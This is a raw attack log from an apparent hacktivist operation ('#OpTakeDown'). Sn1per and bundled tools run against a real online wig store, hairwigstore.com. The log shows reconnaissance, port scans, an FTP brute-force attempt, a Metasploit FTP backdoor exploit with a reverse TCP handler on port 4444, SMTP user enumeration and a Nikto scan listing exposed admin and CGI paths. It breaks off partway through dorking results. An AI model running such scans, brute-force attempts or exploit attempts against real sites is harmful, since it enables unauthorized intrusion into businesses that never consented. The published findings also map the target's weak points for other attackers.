#‎OpTakeDown_TheHumanityParty‬(2)

1. **TARGET: HAIRWIGSTORE.COM**
2.  
3. ____
4. _________ / _/___ ___ _____
5. / ___/ __ \ / // __ \/ _ \/ ___/
6. (__ ) / / // // /_/ / __/ /
7. /____/_/ /_/___/ .___/\___/_/
8. /_/
9.  
10. + -- --=[http://crowdshield.com
11. + -- --=[sn1per v1.7 by 1N3
12.  
13. ################################### Running recon #################################
14. ../../../../lib/isc/unix/net.c:581: sendmsg() failed: Operation not permitted
15. Server: 8.8.8.8
16. Address: 8.8.8.8#53
17.  
18. Non-authoritative answer:
19. Name: hairwigstore.com
20. Address: 192.254.237.91
21.  
22. ../../../../lib/isc/unix/net.c:581: sendmsg() failed: Operation not permitted
23. hairwigstore.com has address 192.254.237.91
24. hairwigstore.com mail is handled by 0 hairwigstore.com.
25.  
26. Xprobe2 v.0.3 Copyright (c) 2002-2005 [email protected], [email protected], [email protected]
27.  
28. [+] Target is hairwigstore.com
29. [+] Loading modules.
30. [+] Following modules are loaded:
31. [x] [1] ping:icmp_ping - ICMP echo discovery module
32. [x] [2] ping:tcp_ping - TCP-based ping discovery module
33. [x] [3] ping:udp_ping - UDP-based ping discovery module
34. [x] [4] infogather:ttl_calc - TCP and UDP based TTL distance calculation
35. [x] [5] infogather:portscan - TCP and UDP PortScanner
36. [x] [6] fingerprint:icmp_echo - ICMP Echo request fingerprinting module
37. [x] [7] fingerprint:icmp_tstamp - ICMP Timestamp request fingerprinting module
38. [x] [8] fingerprint:icmp_amask - ICMP Address mask request fingerprinting module
39. [x] [9] fingerprint:icmp_port_unreach - ICMP port unreachable fingerprinting module
40. [x] [10] fingerprint:tcp_hshake - TCP Handshake fingerprinting module
41. [x] [11] fingerprint:tcp_rst - TCP RST fingerprinting module
42. [x] [12] fingerprint:smb - SMB fingerprinting module
43. [x] [13] fingerprint:snmp - SNMPv2c fingerprinting module
44. [+] 13 modules registered
45. [+] Initializing scan engine
46. [+] Running scan engine
47. [-] ping:tcp_ping module: no closed/open TCP ports known on 192.254.237.91. Module test failed
48. [-] ping:udp_ping module: no closed/open UDP ports known on 192.254.237.91. Module test failed
49. [-] No distance calculation. 192.254.237.91 appears to be dead or no ports known
50. [+] Host: 192.254.237.91 is up (Guess probability: 50%)
51. [+] Target: 192.254.237.91 is alive. Round-Trip Time: 0.22598 sec
52. [+] Selected safe Round-Trip Time value is: 0.45196 sec
53. [-] fingerprint:tcp_hshake Module execution aborted (no open TCP ports known)
54. [-] fingerprint:smb need either TCP port 139 or 445 to run
55. [-] fingerprint:snmp: need UDP port 161 open
56. [+] Primary guess:
57. [+] Host 192.254.237.91 Running OS: `����U (Guess probability: 96%)
58. [+] Other guesses:
59. [+] Host 192.254.237.91 Running OS: `����U (Guess probability: 96%)
60. [+] Host 192.254.237.91 Running OS: `����U (Guess probability: 96%)
61. [+] Host 192.254.237.91 Running OS: `����U (Guess probability: 96%)
62. [+] Host 192.254.237.91 Running OS: `����U (Guess probability: 96%)
63. [+] Host 192.254.237.91 Running OS: `����U (Guess probability: 96%)
64. [+] Host 192.254.237.91 Running OS: `����U (Guess probability: 96%)
65. [+] Host 192.254.237.91 Running OS: `����U (Guess probability: 96%)
66. [+] Host 192.254.237.91 Running OS: `����U (Guess probability: 96%)
67. [+] Host 192.254.237.91 Running OS: `����U (Guess probability: 96%)
68. [+] Cleaning up scan engine
69. [+] Modules deinitialized
70. [+] Execution completed.
71. ../../../../lib/isc/unix/net.c:581: sendmsg() failed: Operation not permitted
72.  
73. ; <<>> DiG 9.10.3-P4-Debian <<>> -x hairwigstore.com
74. ;; global options: +cmd
75. ;; Got answer:
76. ;; ->>HEADER<<- opcode: QUERY, status: NXDOMAIN, id: 7036
77. ;; flags: qr rd ra ad; QUERY: 1, ANSWER: 0, AUTHORITY: 1, ADDITIONAL: 1
78.  
79. ;; OPT PSEUDOSECTION:
80. ; EDNS: version: 0, flags:; udp: 4096
81. ;; QUESTION SECTION:
82. ;com.hairwigstore.in-addr.arpa. IN PTR
83.  
84. ;; AUTHORITY SECTION:
85. in-addr.arpa. 3600 IN SOA b.in-addr-servers.arpa. nstld.iana.org. 2015073958 1800 900 604800 3600
86.  
87. ;; Query time: 181 msec
88. ;; SERVER: 8.8.8.8#53(8.8.8.8)
89. ;; WHEN: Thu Jul 07 20:43:12 EEST 2016
90. ;; MSG SIZE rcvd: 126
91.  
92.  
93. Whois Server Version 2.0
94.  
95. Domain names in the .com and .net domains can now be registered
96. with many different competing registrars. Go to http://www.internic.net
97. for detailed information.
98.  
99. Domain Name: HAIRWIGSTORE.COM
100. Registrar: GODADDY.COM, LLC
101. Sponsoring Registrar IANA ID: 146
102. Whois Server: whois.godaddy.com
103. Referral URL: http://www.godaddy.com
104. Name Server: NS847.HOSTGATOR.COM
105. Name Server: NS848.HOSTGATOR.COM
106. Status: clientDeleteProhibited https://icann.org/epp#clientDeleteProhibited
107. Status: clientRenewProhibited https://icann.org/epp#clientRenewProhibited
108. Status: clientTransferProhibited https://icann.org/epp#clientTransferProhibited
109. Status: clientUpdateProhibited https://icann.org/epp#clientUpdateProhibited
110. Updated Date: 02-jan-2015
111. Creation Date: 19-oct-2008
112. Expiration Date: 19-oct-2016
113.  
114. >>> Last update of whois database: Thu, 07 Jul 2016 17:42:57 GMT <<<
115.  
116. For more information on Whois status codes, please visit https://icann.org/epp
117.  
118. NOTICE: The expiration date displayed in this record is the date the
119. registrar's sponsorship of the domain name registration in the registry is
120. currently set to expire. This date does not necessarily reflect the expiration
121. date of the domain name registrant's agreement with the sponsoring
122. registrar. Users may consult the sponsoring registrar's Whois database to
123. view the registrar's reported date of expiration for this registration.
124.  
125. TERMS OF USE: You are not authorized to access or query our Whois
126. database through the use of electronic processes that are high-volume and
127. automated except as reasonably necessary to register domain names or
128. modify existing registrations; the Data in VeriSign Global Registry
129. Services' ("VeriSign") Whois database is provided by VeriSign for
130. information purposes only, and to assist persons in obtaining information
131. about or related to a domain name registration record. VeriSign does not
132. guarantee its accuracy. By submitting a Whois query, you agree to abide
133. by the following terms of use: You agree that you may use this Data only
134. for lawful purposes and that under no circumstances will you use this Data
135. to: (1) allow, enable, or otherwise support the transmission of mass
136. unsolicited, commercial advertising or solicitations via e-mail, telephone,
137. or facsimile; or (2) enable high volume, automated, electronic processes
138. that apply to VeriSign (or its computer systems). The compilation,
139. repackaging, dissemination or other use of this Data is expressly
140. prohibited without the prior written consent of VeriSign. You agree not to
141. use electronic processes that are automated and high-volume to access or
142. query the Whois database except as reasonably necessary to register
143. domain names or modify existing registrations. VeriSign reserves the right
144. to restrict your access to the Whois database in its sole discretion to ensure
145. operational stability. VeriSign may restrict or terminate your access to the
146. Whois database for failure to abide by these terms of use. VeriSign
147. reserves the right to modify these terms at any time.
148.  
149. The Registry database contains ONLY .COM, .NET, .EDU domains and
150. Registrars.
151. fgets: Connection reset by peer
152. Smartmatch is experimental at ./dnsenum.pl line 698.
153. Smartmatch is experimental at ./dnsenum.pl line 698.
154. dnsenum.pl VERSION:1.2.4
155.  
156. ----- hairwigstore.com -----
157.  
158.  
159. Host's addresses:
160. __________________
161.  
162. hairwigstore.com. 14389 IN A 192.254.237.91
163.  
164.  
165. Name Servers:
166. ______________
167.  
168. ns847.hostgator.com. 43200 IN A 192.254.190.45
169. ns848.hostgator.com. 43200 IN A 192.254.186.42
170.  
171.  
172. Mail (MX) Servers:
173. ___________________
174.  
175. hairwigstore.com. 14388 IN A 192.254.237.91
176.  
177.  
178. Trying Zone Transfers and getting Bind Versions:
179. _________________________________________________
180.  
181.  
182. Trying Zone Transfer for hairwigstore.com on ns847.hostgator.com ...
183. AXFR record query failed: REFUSED
184.  
185. Trying Zone Transfer for hairwigstore.com on ns848.hostgator.com ...
186. AXFR record query failed: REFUSED
187.  
188. brute force file not specified, bay.
189.  
190. ____ _ _ _ _ _____
191. / ___| _ _| |__ | (_)___| |_|___ / _ __
192. \___ \| | | | '_ \| | / __| __| |_ \| '__|
193. ___) | |_| | |_) | | \__ \ |_ ___) | |
194. |____/ \__,_|_.__/|_|_|___/\__|____/|_|
195.  
196. # Fast Subdomains Enumeration tool using Search Engines and BruteForce
197. # Coded By Ahmed Aboul-Ela - @aboul3la
198. # Special Thanks to Ibrahim Mosaad - @ibrahim_mosaad for his contributions
199.  
200. [-] Enumerating subdomains now for hairwigstore.com
201. [-] verbosity is enabled, will show the subdomains results in realtime
202. [-] Searching now in Baidu..
203. [-] Searching now in Yahoo..
204. [-] Searching now in Google..
205. [-] Searching now in Bing..
206. [-] Searching now in Ask..
207. [-] Searching now in Netcraft..
208. [-] Searching now in DNSdumpster..
209. Bing: www.hairwigstore.com
210. Yahoo: www.hairwigstore.com
211. [-] Total Unique Subdomains Found: 1
212. www.hairwigstore.com
213.  
214. ################################### Pinging host ###################################
215. PING hairwigstore.com (192.254.237.91) 56(84) bytes of data.
216. 64 bytes from 192.254.237.91 (192.254.237.91): icmp_seq=1 ttl=51 time=225 ms
217.  
218. --- hairwigstore.com ping statistics ---
219. 1 packets transmitted, 1 received, 0% packet loss, time 0ms
220. rtt min/avg/max/mdev = 225.667/225.667/225.667/0.000 ms
221.  
222. ################################### Running TCP port scan ##########################
223.  
224. Starting Nmap 7.12SVN ( https://nmap.org ) at 2016-07-07 20:43 EEST
225. Nmap scan report for hairwigstore.com (192.254.237.91)
226. Host is up (0.23s latency).
227. Not shown: 23 closed ports, 6 filtered ports
228. PORT STATE SERVICE
229. 21/tcp open ftp
230. 25/tcp open smtp
231. 80/tcp open http
232. 110/tcp open pop3
233. 443/tcp open https
234. 3306/tcp open mysql
235. 8080/tcp open http-proxy
236. 8443/tcp open https-alt
237.  
238. Nmap done: 1 IP address (1 host up) scanned in 2.34 seconds
239. ################################### Running UDP port scan ##########################
240.  
241. Starting Nmap 7.12SVN ( https://nmap.org ) at 2016-07-07 20:43 EEST
242. WARNING: a TCP scan type was requested, but no tcp ports were specified. Skipping this scan type.
243. Nmap done: 1 IP address (1 host up) scanned in 0.52 seconds
244.  
245. ################################### Running Intrusive Scans ########################
246. + -- --=[Port 21 opened... running tests...
247.  
248. Starting Nmap 7.12SVN ( https://nmap.org ) at 2016-07-07 20:43 EEST
249. Nmap scan report for hairwigstore.com (192.254.237.91)
250. Host is up (0.22s latency).
251. PORT STATE SERVICE VERSION
252. 21/tcp open ftp Pure-FTPd
253. | ftp-brute:
254. | Accounts: No valid accounts found
255. | Statistics: Performed 21 guesses in 84 seconds, average tps: 0
256. |_ ERROR: Too many retries, aborted ...
257.  
258. Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
259. Nmap done: 1 IP address (1 host up) scanned in 86.52 seconds
260.  
261.  
262. _---------.
263. .' ####### ;."
264. .---,. ;@ @@`; .---,..
265. ." @@@@@'.,'@@ @@@@@',.'@@@@ ".
266. '-.@@@@@@@@@@@@@ @@@@@@@@@@@@@ @;
267. `.@@@@@@@@@@@@ @@@@@@@@@@@@@@ .'
268. "--'.@@@ -.@ @ ,'- .'--"
269. ".@' ; @ @ `. ;'
270. |@@@@ @@@ @ .
271. ' @@@ @@ @@ ,
272. `.@@@@ @@ .
273. ',@@ @ ; _____________
274. ( 3 C ) /|___ / Metasploit! \
275. ;@'. __*__,." \|--- \_____________/
276. '(.,...."/
277.  
278.  
279. Save 45% of your time on large engagements with Metasploit Pro
280. Learn more on http://rapid7.com/metasploit
281.  
282. =[ metasploit v4.12.7-dev ]
283. + -- --=[ 1551 exploits - 898 auxiliary - 267 post ]
284. + -- --=[ 438 payloads - 38 encoders - 8 nops ]
285. + -- --=[ Free Metasploit Pro trial: http://r-7.co/trymsp ]
286.  
287. RHOST => hairwigstore.com
288. RHOSTS => hairwigstore.com
289. [*] hairwigstore.com:21 - Banner: 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------
290. 220-You are user number 4 of 150 allowed.
291. 220-Local time is now 12:45. Server port: 21.
292. 220-IPv6 connections are also welcome on this server.
293. 220 You will be disconnected after 15 minutes of inactivity.
294. [*] hairwigstore.com:21 - USER: 331 User v44e:) OK. Password required
295. [*] Exploit completed, but no session was created.
296. [*] Started reverse TCP double handler on 10.42.0.14:4444
297. [*] hairwigstore.com:21 - Sending Backdoor Command
298. [*] Exploit completed, but no session was created.
299. + -- --=[Port 22 closed... skipping.
300. + -- --=[Port 23 closed... skipping.
301. + -- --=[Port 25 opened... running tests...
302.  
303. Starting Nmap 7.12SVN ( https://nmap.org ) at 2016-07-07 20:45 EEST
304. Nmap scan report for hairwigstore.com (192.254.237.91)
305. Host is up (0.22s latency).
306. PORT STATE SERVICE VERSION
307. 25/tcp open smtp Exim smtpd 4.86_1
308. | smtp-commands: gator3130.hostgator.com Hello hairwigstore.com [46.165.242.166], SIZE 52428800, 8BITMIME, PIPELINING, AUTH PLAIN LOGIN, STARTTLS, HELP,
309. |_ Commands supported: AUTH STARTTLS HELO EHLO MAIL RCPT DATA NOOP QUIT RSET HELP
310. | smtp-enum-users:
311. |_ Couldn't find any accounts
312. |_smtp-open-relay: Couldn't establish connection on port 25
313. | smtp-vuln-cve2010-4344:
314. |_ The SMTP server is not Exim: NOT VULNERABLE
315. Service Info: Host: gator3130.hostgator.com
316.  
317. Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
318. Nmap done: 1 IP address (1 host up) scanned in 19.54 seconds
319. Starting smtp-user-enum v1.2 ( http://pentestmonkey.net/tools/smtp-user-enum )
320.  
321. ----------------------------------------------------------
322. | Scan Information |
323. ----------------------------------------------------------
324.  
325. Mode ..................... VRFY
326. Worker Processes ......... 5
327. Usernames file ........... BruteX/wordlists/simple-users.txt
328. Target count ............. 1
329. Username count ........... 34
330. Target TCP port .......... 25
331. Query timeout ............ 5 secs
332. Target domain ............
333.  
334. ######## Scan started at Thu Jul 7 20:45:46 2016 #########
335. ######## Scan completed at Thu Jul 7 20:45:56 2016 #########
336. 0 results.
337.  
338. 34 queries in 10 seconds (3.4 queries / sec)
339.  
340. %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
341. %% %%% %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
342. %% %% %%%%%%%% %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
343. %% % %%%%%%%% %%%%%%%%%%% http://metasploit.pro %%%%%%%%%%%%%%%%%%%%%%%%%
344. %% %% %%%%%% %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
345. %% %%%%%%%%% %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
346. %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
347. %%%%% %%% %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
348. %%%% %% %%%%%%%%%%% %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% %%% %%%%%
349. %%%% %% %% % %% %% %%%%% % %%%% %% %%%%%% %%
350. %%%% %% %% % %%% %%%% %%%% %% %%%% %%%% %% %% %% %%% %% %%% %%%%%
351. %%%% %%%%%% %% %%%%%% %%%% %%% %%%% %% %% %%% %%% %% %% %%%%%
352. %%%%%%%%%%%% %%%% %%%%% %% %% % %% %%%% %%%% %%% %%% %
353. %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% %%%%%%% %%%%%%%%%%%%%%
354. %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% %%%%%%%%%%%%%%
355. %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
356.  
357.  
358. Tired of typing 'set RHOSTS'? Click & pwn with Metasploit Pro
359. Learn more on http://rapid7.com/metasploit
360.  
361. =[ metasploit v4.12.7-dev ]
362. + -- --=[ 1551 exploits - 898 auxiliary - 267 post ]
363. + -- --=[ 438 payloads - 38 encoders - 8 nops ]
364. + -- --=[ Free Metasploit Pro trial: http://r-7.co/trymsp ]
365.  
366. RHOSTS => hairwigstore.com
367. RHOST => hairwigstore.com
368. [*] 192.254.237.91:25 - 192.254.237.91:25 Banner: 220-gator3130.hostgator.com ESMTP Exim 4.86_1 #1 Thu, 07 Jul 2016 12:46:10 -0500
369. 220-We do not authorize the use of this system to transport unsolicited,
370. 220 and/or bulk e-mail.
371. [*] 192.254.237.91:25 - 192.254.237.91:25 could not be enumerated (no EXPN, no VRFY, invalid RCPT)
372. [*] hairwigstore.com:25 - Scanned 1 of 1 hosts (100% complete)
373. [*] Auxiliary module execution completed
374. + -- --=[Port 53 closed... skipping.
375. + -- --=[Port 79 closed... skipping.
376. + -- --=[Port 80 opened... running tests...
377. ################################### Checking for WAF ##############################
378.  
379. ^ ^
380. _ __ _ ____ _ __ _ _ ____
381. ///7/ /.' \ / __////7/ /,' \ ,' \ / __/
382. | V V // o // _/ | V V // 0 // 0 // _/
383. |_n_,'/_n_//_/ |_n_,' \_,' \_,'/_/
384. <
385. ...'
386.  
387. WAFW00F - Web Application Firewall Detection Tool
388.  
389. By Sandro Gauci && Wendel G. Henrique
390.  
391. Checking http://hairwigstore.com
392. The site http://hairwigstore.com is behind a ModSecurity (OWASP CRS)
393. Number of requests: 11
394.  
395. ################################### Gathering HTTP Info ###########################
396. ./whatweb: /usr/lib/ruby/vendor_ruby/rchardet/universaldetector.rb:39: invalid multibyte escape: /[\x80-\xFF]/ (SyntaxError)
397.  
398. __ ______ _____
399. \ \/ / ___|_ _|
400. \ /\___ \ | |
401. / \ ___) || |
402. /_/\_|____/ |_|
403.  
404. + -- --=[Cross-Site Tracer v1.3 by 1N3 @ CrowdShield
405. + -- --=[Target: hairwigstore.com:80
406. + -- --=[Site not vulnerable to Cross-Site Tracing!
407. + -- --=[Site not vulnerable to Host Header Injection!
408. + -- --=[Site vulnerable to Cross-Frame Scripting!
409. + -- --=[Site vulnerable to Clickjacking!
410.  
411. HTTP/1.1 405 Not Allowed
412. Server: nginx/1.10.1
413. Date: Thu, 07 Jul 2016 17:46:23 GMT
414. Content-Type: text/html
415. Content-Length: 173
416. Connection: close
417.  
418. <html>
419. <head><title>405 Not Allowed</title></head>
420. <body bgcolor="white">
421. <center><h1>405 Not Allowed</h1></center>
422. <hr><center>nginx/1.10.1</center>
423. </body>
424. </html>
425.  
426. HTTP/1.1 301 Moved Permanently
427. Server: nginx/1.10.1
428. Date: Thu, 07 Jul 2016 17:46:24 GMT
429. Content-Type: text/html; charset=iso-8859-1
430. Content-Length: 302
431. Connection: keep-alive
432. Location: http://www.hairwigstore.com/
433.  
434. <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
435. <html><head>
436. <title>301 Moved Permanently</title>
437. </head><body>
438. <h1>Moved Permanently</h1>
439. <p>The document has moved <a href="http://www.hairwigstore.com/">here</a>.</p>
440. <hr>
441. <address>Apache Server at hairwigstore.com Port 80</address>
442. </body></html>
443.  
444.  
445.  
446.  
447. ################################### Checking HTTP Headers #########################
448. + -- --=[Checking if X-Content options are enabled on hairwigstore.com...
449.  
450. + -- --=[Checking if X-Frame options are enabled on hairwigstore.com...
451.  
452. + -- --=[Checking if X-XSS-Protection header is enabled on hairwigstore.com...
453.  
454. + -- --=[Checking HTTP methods on hairwigstore.com...
455.  
456. + -- --=[Checking if TRACE method is enabled on hairwigstore.com...
457.  
458. + -- --=[Checking for open proxy on hairwigstore.com...
459. <head>
460. <meta name="robots" content="noarchive" />
461. <meta name="googlebot" content="nosnippet" />
462. </head>
463. <body>
464. <div align=center>
465. <h3>Error. Page cannot be displayed. Please contact your service provider for more details. (11)</h3>
466. </div>
467. </body>
468. </html>
469. + -- --=[Enumerating software on hairwigstore.com...
470. Server: nginx/1.10.1
471.  
472. + -- --=[Checking if Strict-Transport-Security is enabled on hairwigstore.com...
473.  
474. + -- --=[Checking for Flash cross-domain policy on hairwigstore.com...
475. <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
476. <html><head>
477. <title>301 Moved Permanently</title>
478. </head><body>
479. <h1>Moved Permanently</h1>
480. <p>The document has moved <a href="http://www.hairwigstore.com/crossdomain.xml">here</a>.</p>
481. <hr>
482. <address>Apache Server at hairwigstore.com Port 80</address>
483. </body></html>
484.  
485. + -- --=[Checking for Silverlight cross-domain policy on hairwigstore.com...
486. <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
487. <html><head>
488. <title>301 Moved Permanently</title>
489. </head><body>
490. <h1>Moved Permanently</h1>
491. <p>The document has moved <a href="http://www.hairwigstore.com/clientaccesspolicy.xml">here</a>.</p>
492. <hr>
493. <address>Apache Server at hairwigstore.com Port 80</address>
494. </body></html>
495.  
496. + -- --=[Checking for HTML5 cross-origin resource sharing on hairwigstore.com...
497.  
498. + -- --=[Retrieving robots.txt on hairwigstore.com...
499. <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
500. <html><head>
501. <title>301 Moved Permanently</title>
502. </head><body>
503. <h1>Moved Permanently</h1>
504. <p>The document has moved <a href="http://www.hairwigstore.com/robots.txt">here</a>.</p>
505. <hr>
506. <address>Apache Server at hairwigstore.com Port 80</address>
507. </body></html>
508.  
509. + -- --=[Retrieving sitemap.xml on hairwigstore.com...
510. <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
511. <html><head>
512. <title>301 Moved Permanently</title>
513. </head><body>
514. <h1>Moved Permanently</h1>
515. <p>The document has moved <a href="http://www.hairwigstore.com/sitemap.xml">here</a>.</p>
516. <hr>
517. <address>Apache Server at hairwigstore.com Port 80</address>
518. </body></html>
519.  
520. + -- --=[Checking cookie attributes on hairwigstore.com...
521.  
522. + -- --=[Checking for ASP.NET Detailed Errors on hairwigstore.com...
523.  
524.  
525. ################################### Running Web Vulnerability Scan ################
526. - Nikto v2.1.6
527. ---------------------------------------------------------------------------
528. + Target IP: 192.254.237.91
529. + Target Hostname: hairwigstore.com
530. + Target Port: 80
531. + Start Time: 2016-07-07 20:46:36 (GMT3)
532. ---------------------------------------------------------------------------
533. + Server: nginx/1.10.1
534. + The anti-clickjacking X-Frame-Options header is not present.
535. + The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
536. + The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
537. + Root page / redirects to: http://www.hairwigstore.com/
538. + /cgi-sys/formmail.cgi: The remote CGI reveals its version number, which may aid attackers in finding vulnerabilities in the script.
539. + /cgi-sys/formmail.pl: Many versions of FormMail have remote vulnerabilities, including file access, information disclosure and email abuse. FormMail access should be restricted as much as possible or a more secure solution found.
540. + /webmail/blank.html: IlohaMail 0.8.10 contains an XSS vulnerability. Previous versions contain other non-descript vulnerabilities.
541. + /securecontrolpanel/: Web Server Control Panel
542. + /webmail/: Web based mail package installed.
543. + /cgi-sys/Count.cgi: This may allow attackers to execute arbitrary commands on the server
544. + OSVDB-3233: /mailman/listinfo: Mailman was found on the server.
545. + OSVDB-2117: /cpanel/: Web-based control panel
546. + OSVDB-3092: /cgi-sys/entropysearch.cgi?query=asdfasdf&user=root&basehref=%2F%2Fwww.yourdomain.com/: CPanel's Entropy Search allows username enumeration via the user parameter.
547. + OSVDB-3092: /cgi-sys/FormMail-clone.cgi: Default CGI, often with a hosting manager. No known problems, but host managers allow sys admin via web
548. + OSVDB-3092: /img-sys/: Default image directory should not allow directory listing.
549. + OSVDB-3092: /java-sys/: Default Java directory should not allow directory listing.
550. + OSVDB-3093: /webmail/lib/emailreader_execute_on_each_page.inc.php: This might be interesting... has been seen in web logs from an unknown scanner.
551. + /controlpanel/: Admin login page/section found.
552. + Server leaks inodes via ETags, header found with file /cgi-sys/c99.php, fields: 0x56a90723 0x16e2
553. + 8257 requests: 0 error(s) and 18 item(s) reported on remote host
554. + End Time: 2016-07-07 21:25:23 (GMT3) (2327 seconds)
555. ---------------------------------------------------------------------------
556. + 1 host(s) tested
557. ################################### Saving Web Screenshots ########################
558. [+] Screenshot saved to /root/Sn1per/loot/hairwigstore.com-port80.jpg
559.  
560. (cutycapt:27720): Gtk-WARNING **: Theme directory devices/scalable of theme maia has no size field
561.  
562. openjdk version "1.8.0_91"
563. OpenJDK Runtime Environment (build 1.8.0_91-8u91-b14-3-b14)
564. OpenJDK 64-Bit Server VM (build 25.91-b14, mixed mode)
565. ################################### Running Google Hacking Queries #############
566. ################################### Running InUrlBR OSINT Queries ##############
567.  
568. _____ .701F. .iBR. .7CL. .70BR. .7BR. .7BR'''Cq. .70BR. .1BR'''Yp, .8BR'''Cq.
569. (_____) 01 01N. C 01 C 01 .01. 01 01 Yb 01 .01.
570. (() ()) 01 C YCb C 01 C 01 ,C9 01 01 dP 01 ,C9
571. \ / 01 C .CN. C 01 C 0101dC9 01 01'''bg. 0101dC9
572. \ / 01 C .01.C 01 C 01 YC. 01 , 01 .Y 01 YC.
573. /=\ 01 C Y01 YC. ,C 01 .Cb. 01 ,C 01 ,9 01 .Cb.
574. [___] .J01L. .JCL. YC .b0101d'. .J01L. .J01. .J01010101C .J0101Cd9 .J01L. .J01./ 2.1
575.  
576. __[ ! ] Neither war between hackers, nor peace for the system.
577. __[ ! ] http://blog.inurl.com.br
578. __[ ! ] http://fb.com/InurlBrasil
579. __[ ! ] http://twitter.com/@googleinurl
580. __[ ! ] http://github.com/googleinurl
581. __[ ! ] Current PHP version::[ 5.6.22-2 ]
582. __[ ! ] Current script owner::[ root ]
583. __[ ! ] Current uname::[ Linux anonymous 4.6.0-parrot-amd64 #1 SMP Parrot 4.6.2-2parrot0 (2016-06-29) x86_64 ]
584. __[ ! ] Current pwd::[ /root/Sn1per ]
585. __[ ! ] Help: php inurlbr.php --help
586. ------------------------------------------------------------------------------------------------------------------------
587.  
588. [ ! ] Starting SCANNER INURLBR 2.1 at [07-07-2016 21:25:42]
589. [ ! ] legal disclaimer: Usage of INURLBR for attacking targets without prior mutual consent is illegal.
590. It is the end user's responsibility to obey all applicable local, state and federal laws.
591. Developers assume no liability and are not responsible for any misuse or damage caused by this program
592.  
593. [ INFO ][ OUTPUT FILE ]:: [ /root/Sn1per/output/loot/inurlbr-hairwigstore.com.txt ]
594. [ INFO ][ DORK ]::[ site:hairwigstore.com ]
595. [ INFO ][ SEARCHING ]:: {
596. [ INFO ][ ENGINE ]::[ GOOGLE - www.google.la ]
597.  
598. [ INFO ][ SEARCHING ]::
599. -[:::]
600. [ INFO ][ ENGINE ]::[ GOOGLE API ]
601.  
602. [ INFO ][ SEARCHING ]::
603. -[:::]-[:::]-[:::]-[:::]-[:::]-[:::]-[:::]-[:::]-[:::]-[:::]-[:::]-[:::]-[:::]-[:::]-[:::]
604. [ INFO ][ ENGINE ]::[ GOOGLE_GENERIC_RANDOM - www.google.gr ID: 013269018370076798483:wdba3dlnxqm ]
605.  
606. [ INFO ][ SEARCHING ]::
607. -[:::]-[:::]-[:::]-[:::]-[:::]-[:::]
608.  
609. [ INFO ][ TOTAL FOUND VALUES ]:: [ 19 ]
610.  
611.  
612. _[ - ]::--------------------------------------------------------------------------------------------------------------
613. |_[ + ] [ 0 / 19 ]-[21:26:01] [ - ]
614. |_[ + ] Target:: [ http://www.hairwigstore.com/ ]
615. |_[ + ] Exploit::
616. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: nginx/1.10.1 , IP:192.254.237.91:80
617. |_[ + ] More details:: / - / , ISP:
618. |_[ + ] Found:: UNIDENTIFIED
619.  
620. _[ - ]::--------------------------------------------------------------------------------------------------------------
621. |_[ + ] [ 1 / 19 ]-[21:26:03] [ - ]
622. |_[ + ] Target:: [ http://www.hairwigstore.com/Store/Wigs ]
623. |_[ + ] Exploit::
624. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: nginx/1.10.1 , IP:192.254.237.91:80
625. |_[ + ] More details:: / - / , ISP:
626. |_[ + ] Found:: UNIDENTIFIED
627.  
628. _[ - ]::--------------------------------------------------------------------------------------------------------------
629. |_[ + ] [ 2 / 19 ]-[21:26:05] [ - ]
630. |_[ + ] Target:: [ http://www.hairwigstore.com/Store/Extensions ]
631. |_[ + ] Exploit::
632. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: nginx/1.10.1 , IP:192.254.237.91:80
633. |_[ + ] More details:: / - / , ISP:
634. |_[ + ] Found:: UNIDENTIFIED
635.  
636. _[ - ]::--------------------------------------------------------------------------------------------------------------
637. |_[ + ] [ 3 / 19 ]-[21:26:06] [ - ]
638. |_[ + ] Target:: [ http://www.hairwigstore.com/Store/Toupees ]
639. |_[ + ] Exploit::
640. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: nginx/1.10.1 , IP:192.254.237.91:80
641. |_[ + ] More details:: / - / , ISP:
642. |_[ + ] Found:: UNIDENTIFIED
643.  
644. _[ - ]::--------------------------------------------------------------------------------------------------------------
645. |_[ + ] [ 4 / 19 ]-[21:26:07] [ - ]
646. |_[ + ] Target:: [ http://www.hairwigstore.com/Sitemap ]
647. |_[ + ] Exploit::
648. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: nginx/1.10.1 , IP:192.254.237.91:80
649. |_[ + ] More details:: / - / , ISP:
650. |_[ + ] Found:: UNIDENTIFIED
651.  
652. _[ - ]::--------------------------------------------------------------------------------------------------------------
